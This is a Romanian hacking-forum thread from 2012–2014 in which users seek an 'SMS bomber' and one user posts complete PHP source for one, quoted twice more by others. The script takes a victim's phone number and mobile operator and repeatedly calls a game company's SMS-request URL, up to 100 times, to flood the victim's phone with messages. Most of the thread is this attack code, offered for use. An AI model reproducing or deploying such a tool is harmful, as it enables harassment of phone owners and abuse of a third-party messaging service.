bubu2005 Posted May 22, 2012 Report Posted May 22, 2012 bigi said: Sms bomber cosmote mai functioneaza ?Da da numaul de cosmote Quote
TriffyBoy Posted September 7, 2012 Report Posted September 7, 2012 Va rog frumos puteti sa il re-uploadati?Deoarece megaupload.com a fost inchis de mult Quote
skraoski Posted September 10, 2012 Report Posted September 10, 2012 Nu face nimeni un upload la sms bomber ? Quote
SilviuSDS Posted September 10, 2012 Report Posted September 10, 2012 Uite unul ce l-am facut eu in php:<?php/*\\\\\\\----SMS Bomber----///////Author: SilviuSDS*/$country = 175;$cosmote = 327;$orange = 329;$vodafone = 328;$header = "<link rel=\"stylesheet\" href=\"style.css\"/><body style=\"padding: -100px;\"><div class=\"title\">SMS Bomber</div>";$form = sprintf("<center><form action=\"index.php\" method=\"post\"><span class=\"text\">Choose career:</span> <select class=\"search-input\" name=\"operator\" style=\"width: 200px;\"> <option value=\"%u\">Cosmote</option> <option value=\"%u\">Orange</option> <option value=\"%u\">Vodafone</option></select></br></br><span class=\"text\">Phone Number: </span><input type=\"text\" class=\"search-input\" name=\"phone\" style=\"width: 200px;\"/></br></br><div style=\"padding-right:70px;\"><span class=\"text\"> SMS Number (max 100): </span><input type=\"text\" class=\"search-input\" name=\"smscount\" style=\"width: 200px;\"/></div></br></br><input class=\"button\" type=\"submit\" value=\"Send SMS\"/></form></center> ",$cosmote,$orange,$vodafone);$succes = "<center></br></br><div><a href=\"index.php\">Go Back</a></div></center>";function sendSMS($phoneNr, $operator) {$c = curl_init();$url = sprintf("http://www.gameloft.com/request-sms.php?wc=documents&step=1&phone=%u&country=175&operator=%u",$phoneNr,$operator);curl_setopt ($c, CURLOPT_URL, $url);curl_setopt($c, CURLOPT_HEADER, 0);curl_exec($c);}if(!isset($_POST['phone']) || !isset($_POST['operator']) || !isset($_POST['smscount'])) {print($header.$form);}else {$smscount = $_POST['smscount'];if($smscount > 100) {$smscount = 100;}else if($smscount < 5) {$smscount = 5;}print($header);for($count = 1; $count <= $smscount; $count++) {sendSMS($_POST['phone'], $_POST['operator']);printf("<div class=\"text\">SMS no:%u sent</div></br>",$count);}print($succes);}?>Am si unul facut pe jumatate in c++ dar mi-e lene sa-l termin. Quote
Genius++ Posted September 10, 2012 Report Posted September 10, 2012 SilviuSDS said: Uite unul ce l-am facut eu in php:<?php/*\\\\\\\----SMS Bomber----///////Author: SilviuSDS*/$country = 175;$cosmote = 327;$orange = 329;$vodafone = 328;$header = "<link rel=\"stylesheet\" href=\"style.css\"/><body style=\"padding: -100px;\"><div class=\"title\">SMS Bomber</div>";$form = sprintf("<center><form action=\"index.php\" method=\"post\"><span class=\"text\">Choose career:</span> <select class=\"search-input\" name=\"operator\" style=\"width: 200px;\"> <option value=\"%u\">Cosmote</option> <option value=\"%u\">Orange</option> <option value=\"%u\">Vodafone</option></select></br></br><span class=\"text\">Phone Number: </span><input type=\"text\" class=\"search-input\" name=\"phone\" style=\"width: 200px;\"/></br></br><div style=\"padding-right:70px;\"><span class=\"text\"> SMS Number (max 100): </span><input type=\"text\" class=\"search-input\" name=\"smscount\" style=\"width: 200px;\"/></div></br></br><input class=\"button\" type=\"submit\" value=\"Send SMS\"/></form></center> ",$cosmote,$orange,$vodafone);$succes = "<center></br></br><div><a href=\"index.php\">Go Back</a></div></center>";function sendSMS($phoneNr, $operator) {$c = curl_init();$url = sprintf("http://www.gameloft.com/request-sms.php?wc=documents&step=1&phone=%u&country=175&operator=%u",$phoneNr,$operator);curl_setopt ($c, CURLOPT_URL, $url);curl_setopt($c, CURLOPT_HEADER, 0);curl_exec($c);}if(!isset($_POST['phone']) || !isset($_POST['operator']) || !isset($_POST['smscount'])) {print($header.$form);}else {$smscount = $_POST['smscount'];if($smscount > 100) {$smscount = 100;}else if($smscount < 5) {$smscount = 5;}print($header);for($count = 1; $count <= $smscount; $count++) {sendSMS($_POST['phone'], $_POST['operator']);printf("<div class=\"text\">SMS no:%u sent</div></br>",$count);}print($succes);}?>Am si unul facut pe jumatate in c++ dar mi-e lene sa-l termin.+1 , frumos Quote
novicehack Posted January 6, 2014 Report Posted January 6, 2014 SilviuSDS said: Uite unul ce l-am facut eu in php:<?php/*\\\\\\\----SMS Bomber----///////Author: SilviuSDS*/$country = 175;$cosmote = 327;$orange = 329;$vodafone = 328;$header = "<link rel=\"stylesheet\" href=\"style.css\"/><body style=\"padding: -100px;\"><div class=\"title\">SMS Bomber</div>";$form = sprintf("<center><form action=\"index.php\" method=\"post\"><span class=\"text\">Choose career:</span> <select class=\"search-input\" name=\"operator\" style=\"width: 200px;\"> <option value=\"%u\">Cosmote</option> <option value=\"%u\">Orange</option> <option value=\"%u\">Vodafone</option></select></br></br><span class=\"text\">Phone Number: </span><input type=\"text\" class=\"search-input\" name=\"phone\" style=\"width: 200px;\"/></br></br><div style=\"padding-right:70px;\"><span class=\"text\"> SMS Number (max 100): </span><input type=\"text\" class=\"search-input\" name=\"smscount\" style=\"width: 200px;\"/></div></br></br><input class=\"button\" type=\"submit\" value=\"Send SMS\"/></form></center> ",$cosmote,$orange,$vodafone);$succes = "<center></br></br><div><a href=\"index.php\">Go Back</a></div></center>";function sendSMS($phoneNr, $operator) {$c = curl_init();$url = sprintf("http://www.gameloft.com/request-sms.php?wc=documents&step=1&phone=%u&country=175&operator=%u",$phoneNr,$operator);curl_setopt ($c, CURLOPT_URL, $url);curl_setopt($c, CURLOPT_HEADER, 0);curl_exec($c);}if(!isset($_POST['phone']) || !isset($_POST['operator']) || !isset($_POST['smscount'])) {print($header.$form);}else {$smscount = $_POST['smscount'];if($smscount > 100) {$smscount = 100;}else if($smscount < 5) {$smscount = 5;}print($header);for($count = 1; $count <= $smscount; $count++) {sendSMS($_POST['phone'], $_POST['operator']);printf("<div class=\"text\">SMS no:%u sent</div></br>",$count);}print($succes);}?>Am si unul facut pe jumatate in c++ dar mi-e lene sa-l termin.A mai incercat cineva acest sms bomber? L-am urcat pe un site dar nu merge. Da eroare. Quote
spider Posted July 28, 2014 Report Posted July 28, 2014 KaoS_StixX_ said: linkul de download este mort Quote